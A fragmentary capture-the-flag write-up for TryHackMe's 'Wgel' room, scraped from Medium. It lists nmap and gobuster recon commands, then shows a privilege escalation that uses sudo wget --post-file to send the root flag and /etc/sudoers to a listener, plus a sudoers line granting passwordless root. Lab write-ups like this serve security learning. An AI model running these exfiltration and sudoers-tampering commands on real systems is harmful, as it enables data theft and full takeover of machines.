THM — WGEL CTF

  • -sV is the flag for version
  • Pn is a flag to consider all hosts are online
  • -sC is to use the default Nmap scripts
  • -vv is to show the verbose output of Nmap scan results
gobuster dir -u http://10.10.52.93/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
locate *flag.txt
sudo /usr/bin/wget --post-file=<path of file> <Listening IP>
I have sent the content of the root flag using wget
sudo wget --post-file=/etc/sudoers <listener IP>
#jessie ALL=(root) NOPASSWD: /usr/bin/wget
jessie ALL=(ALL) NOPASSWD: ALL

Full time Information Security Engineer, Part time Red Team learner

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

New Coin Listing] KILT Protocol (KILT) Officially Launches on DigiFinex

WGU Launches the Open Skills Management Tool (OSMT) as an Open Source Project

The Impact of iOS 14 on iOS App Development

Writing Elegant Code with Clean Code

Automated Unit Tests — Kin Mobile SDK on Ethereum Part III: Android

Faster Asset syncs with AWS Lambda

Summon of Talented Holmes

Choosing the Right Remote Assistance Software for Your Technicians

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Adithya Sai

Adithya Sai

Full time Information Security Engineer, Part time Red Team learner

More from Medium

TryHackMe: Pentesting Fundamentals a Walkthrough

Network Services (Telnet) — Tryhackme

Writeup — ‘Kill L’

Screenshot — 1

TryHackMe : Boiler CTF